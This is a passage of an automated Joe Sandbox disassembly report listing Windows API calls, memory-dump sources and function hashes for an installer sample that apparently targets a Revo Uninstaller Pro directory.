                                                                                                                                              • Instruction Fuzzy Hash: 9CB0128577D004AD320EB1446D02CB7830FD0C9B96370C03AF10CC8040D4824C910032
                                                                                                                                              APIs
                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 002FD217
                                                                                                                                                • Part of subcall function 002FD53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002FD5B7
                                                                                                                                                • Part of subcall function 002FD53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002FD5C8
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                              • Opcode ID: d7a555363ac4d77a66eccd4b1bbf4d7904c925542d9fd1ac419e95e3fda058e5
                                                                                                                                              • Instruction ID: 1a15b1a155aa8c4256315cece386dcf7e6a271b292046fbb10bc1e0e02e9afc9
                                                                                                                                              • Opcode Fuzzy Hash: d7a555363ac4d77a66eccd4b1bbf4d7904c925542d9fd1ac419e95e3fda058e5
                                                                                                                                              • Instruction Fuzzy Hash: F2B012CA2BD004AD310E51886C06EB6430FE0C9F69370C13AF505C5049D4808E910032
                                                                                                                                              APIs
                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 002FD217
                                                                                                                                                • Part of subcall function 002FD53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002FD5B7
                                                                                                                                                • Part of subcall function 002FD53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002FD5C8
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                              • Opcode ID: da3dcc8025393d2fd2ba4cb34c032aa9d45702d996a5396ad75309d70258bbf8
                                                                                                                                              • Instruction ID: e1342a4cf28bc6a370c198e59d32abddab1396f122f8fd750f6b9203f88f47f5
                                                                                                                                              • Opcode Fuzzy Hash: da3dcc8025393d2fd2ba4cb34c032aa9d45702d996a5396ad75309d70258bbf8
                                                                                                                                              • Instruction Fuzzy Hash: 47B012CA2BD004AD310E51886C06EB6430FD0C9F69370C13AF905C5045D4808E910032
                                                                                                                                              APIs
                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 002FD7EC
                                                                                                                                                • Part of subcall function 002FD53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002FD5B7
                                                                                                                                                • Part of subcall function 002FD53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002FD5C8
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                              • Opcode ID: e49eac2960ea42a2da717a65336961ca5f03bafe3d4dc444915e07e9b9af4251
                                                                                                                                              • Instruction ID: 9289f6fdf132abf7d82fbad16a697e518056f277f01fb7f091c8638ff8cc5485
                                                                                                                                              • Opcode Fuzzy Hash: e49eac2960ea42a2da717a65336961ca5f03bafe3d4dc444915e07e9b9af4251
                                                                                                                                              • Instruction Fuzzy Hash: 36B0128527E406FE310E71516E02CB6C30FC0D5B5E330C03BF100CC04494819C910032
                                                                                                                                              APIs
                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 002FD1B6
                                                                                                                                                • Part of subcall function 002FD53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002FD5B7
                                                                                                                                                • Part of subcall function 002FD53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002FD5C8
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                              • Opcode ID: 159c25f63c37846fd14b77eeddd0d40ffab1aa4b32b9d9f772699812279d2b11
                                                                                                                                              • Instruction ID: 8c07b26ff6877387de08ea24ee0d8a91be9b859d422d041ae942d06b8e525887
                                                                                                                                              • Opcode Fuzzy Hash: 159c25f63c37846fd14b77eeddd0d40ffab1aa4b32b9d9f772699812279d2b11
                                                                                                                                              • Instruction Fuzzy Hash: 0EA0128167D005BC310931406C02C77420FC0C4B95370C429F10980040548108500031
                                                                                                                                              APIs
                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 002FD1B6
                                                                                                                                                • Part of subcall function 002FD53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002FD5B7
                                                                                                                                                • Part of subcall function 002FD53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002FD5C8
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                              • Opcode ID: e326cebb91f298f727a6b5d43f1e0308ab4eff549f1e4af1d3d3e36d01aa70f2
                                                                                                                                              • Instruction ID: 8c07b26ff6877387de08ea24ee0d8a91be9b859d422d041ae942d06b8e525887
                                                                                                                                              • Opcode Fuzzy Hash: e326cebb91f298f727a6b5d43f1e0308ab4eff549f1e4af1d3d3e36d01aa70f2
                                                                                                                                              • Instruction Fuzzy Hash: 0EA0128167D005BC310931406C02C77420FC0C4B95370C429F10980040548108500031
                                                                                                                                              APIs
                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 002FD217
                                                                                                                                                • Part of subcall function 002FD53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002FD5B7
                                                                                                                                                • Part of subcall function 002FD53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002FD5C8
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                              • Opcode ID: 874ee266fe5d118a76b3a46f2e7d535f145951547ad629c7be01ea1521d86d67
                                                                                                                                              • Instruction ID: a4c86601f220200adbd5bad3958e076329161c06160e48acc52b241b6191aec9
                                                                                                                                              • Opcode Fuzzy Hash: 874ee266fe5d118a76b3a46f2e7d535f145951547ad629c7be01ea1521d86d67
                                                                                                                                              • Instruction Fuzzy Hash: 90A012C51BD005BC300911806C06C76430FC0C4FA5370C529F50180045548049500031
                                                                                                                                              APIs
                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 002FD217
                                                                                                                                                • Part of subcall function 002FD53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002FD5B7
                                                                                                                                                • Part of subcall function 002FD53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002FD5C8
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                              • Opcode ID: ede1d2f9824017921c6c2916e16c825b1a8ae757e793eabfeb7db9928ffff349
                                                                                                                                              • Instruction ID: a4c86601f220200adbd5bad3958e076329161c06160e48acc52b241b6191aec9
                                                                                                                                              • Opcode Fuzzy Hash: ede1d2f9824017921c6c2916e16c825b1a8ae757e793eabfeb7db9928ffff349
                                                                                                                                              • Instruction Fuzzy Hash: 90A012C51BD005BC300911806C06C76430FC0C4FA5370C529F50180045548049500031
                                                                                                                                              APIs
                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 002FD217
                                                                                                                                                • Part of subcall function 002FD53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002FD5B7
                                                                                                                                                • Part of subcall function 002FD53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002FD5C8
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                              • Opcode ID: aebd30815698f674a13788123a77fa2f0c874a4d4b646048d56c45b3d4a87583
                                                                                                                                              • Instruction ID: 9bc62528c9233ce6e1e4fcd2986b8bdef79d065231186b63772540150766cf55
                                                                                                                                              • Opcode Fuzzy Hash: aebd30815698f674a13788123a77fa2f0c874a4d4b646048d56c45b3d4a87583
                                                                                                                                              • Instruction Fuzzy Hash: CFA012C51BD0047C300911806C06C76430FC0C0F65370C129F50080049548049500031
                                                                                                                                              APIs
                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 002FD1B6
                                                                                                                                                • Part of subcall function 002FD53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002FD5B7
                                                                                                                                                • Part of subcall function 002FD53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002FD5C8
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                              • Opcode ID: 38757f3f595198cbddf4b1324f1bab995801f0d6dff03976c47c3c90c04a7032
                                                                                                                                              • Instruction ID: 8c07b26ff6877387de08ea24ee0d8a91be9b859d422d041ae942d06b8e525887
                                                                                                                                              • Opcode Fuzzy Hash: 38757f3f595198cbddf4b1324f1bab995801f0d6dff03976c47c3c90c04a7032
                                                                                                                                              • Instruction Fuzzy Hash: 0EA0128167D005BC310931406C02C77420FC0C4B95370C429F10980040548108500031
                                                                                                                                              APIs
                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?,002F9CE4,C:\Program Files\VS Revo Group\Revo Uninstaller Pro,00000000,003285FA,00000006), ref: 002F9A91
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CurrentDirectory
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1611563598-0
                                                                                                                                              • Opcode ID: 60bce42db1c2ebea2501ae43f3480328dfe89863b48fac5eaae317778c7f4843
                                                                                                                                              • Instruction ID: 4407a2cc0aa46c431f997b108482945eef448b8345154e081cef70b57b0a8823
                                                                                                                                              • Opcode Fuzzy Hash: 60bce42db1c2ebea2501ae43f3480328dfe89863b48fac5eaae317778c7f4843
                                                                                                                                              • Instruction Fuzzy Hash: F1A01230194006568A014B30CC09C1676555760702F00C6307102C00A0CB308820A500
                                                                                                                                              APIs
                                                                                                                                              • CloseHandle.KERNEL32(000000FF,?,?,002E94AA), ref: 002E94F5
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CloseHandle
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2962429428-0
                                                                                                                                              • Opcode ID: 77ee036059f4c076a0a10f49b988278d9ac78f6b396bf474c7b6b45e33cb474d
                                                                                                                                              • Instruction ID: ef69a67c03254bfa13829d73e213c9f5742fb353eed13f2d773328c599df5208
                                                                                                                                              • Opcode Fuzzy Hash: 77ee036059f4c076a0a10f49b988278d9ac78f6b396bf474c7b6b45e33cb474d
                                                                                                                                              • Instruction Fuzzy Hash: 4FF0BE704A2B814EEB328E25C508B92B3E89B12730F848B1F80E6435E0D371A8AD8B00
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 002E12D7: GetDlgItem.USER32(00000000,00003021), ref: 002E131B
                                                                                                                                                • Part of subcall function 002E12D7: SetWindowTextW.USER32(00000000,003122E4), ref: 002E1331
                                                                                                                                              • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 002FB04A
                                                                                                                                              • EndDialog.USER32(?,00000006), ref: 002FB05D
                                                                                                                                              • GetDlgItem.USER32(?,0000006C), ref: 002FB079
                                                                                                                                              • SetFocus.USER32(00000000), ref: 002FB080
                                                                                                                                              • SetDlgItemTextW.USER32(?,00000065,?), ref: 002FB0C0
                                                                                                                                              • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 002FB0F3
                                                                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 002FB109
                                                                                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 002FB127
                                                                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 002FB137
                                                                                                                                              • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 002FB154
                                                                                                                                              • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 002FB172
                                                                                                                                              • _swprintf.LIBCMT ref: 002FB1A2
                                                                                                                                                • Part of subcall function 002E3E41: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 002E3E54
                                                                                                                                              • SetDlgItemTextW.USER32(?,0000006A,?), ref: 002FB1B5
                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 002FB1B8
                                                                                                                                              • _swprintf.LIBCMT ref: 002FB213
                                                                                                                                              • SetDlgItemTextW.USER32(?,00000068,?), ref: 002FB226
                                                                                                                                              • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 002FB23C
                                                                                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 002FB25C
                                                                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 002FB26C
                                                                                                                                              • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 002FB286
                                                                                                                                              • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 002FB29E
                                                                                                                                              • _swprintf.LIBCMT ref: 002FB2CF
                                                                                                                                              • SetDlgItemTextW.USER32(?,0000006B,?), ref: 002FB2E2
                                                                                                                                              • _swprintf.LIBCMT ref: 002FB332
                                                                                                                                              • SetDlgItemTextW.USER32(?,00000069,?), ref: 002FB345
                                                                                                                                                • Part of subcall function 002F9D99: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 002F9DBF
                                                                                                                                                • Part of subcall function 002F9D99: GetNumberFormatW.KERNEL32(00000400,00000000,?,0031D600,?,?), ref: 002F9E0E
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                                                                                                              • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                                                                                                              • API String ID: 797121971-1840816070
                                                                                                                                              • Opcode ID: 3b3a6e846182970289e6e0e926955a7e740a09cc8ceea010675a565b70f36023
                                                                                                                                              • Instruction ID: 38dd52c8c65123d9dfe41c1a367f8fdc3f41e4dd026d1d234abacff709989cf3
                                                                                                                                              • Opcode Fuzzy Hash: 3b3a6e846182970289e6e0e926955a7e740a09cc8ceea010675a565b70f36023
                                                                                                                                              • Instruction Fuzzy Hash: 2A91C572258349BBD232DBA0CD49FFBB7ACEB4E740F044829F745D2081DB71A6158B62
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 002E6FCB
                                                                                                                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 002E712B
                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 002E713B
                                                                                                                                                • Part of subcall function 002E7A15: GetCurrentProcess.KERNEL32(00000020,?), ref: 002E7A24
                                                                                                                                                • Part of subcall function 002E7A15: GetLastError.KERNEL32 ref: 002E7A6A
                                                                                                                                                • Part of subcall function 002E7A15: CloseHandle.KERNEL32(?), ref: 002E7A79
                                                                                                                                              • CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 002E7146
                                                                                                                                              • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 002E7254
                                                                                                                                              • DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 002E7280
                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 002E7292
                                                                                                                                              • GetLastError.KERNEL32(00000015,00000000,?), ref: 002E72A2
                                                                                                                                              • RemoveDirectoryW.KERNEL32(?), ref: 002E72EE
                                                                                                                                              • DeleteFileW.KERNEL32(?), ref: 002E7316
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
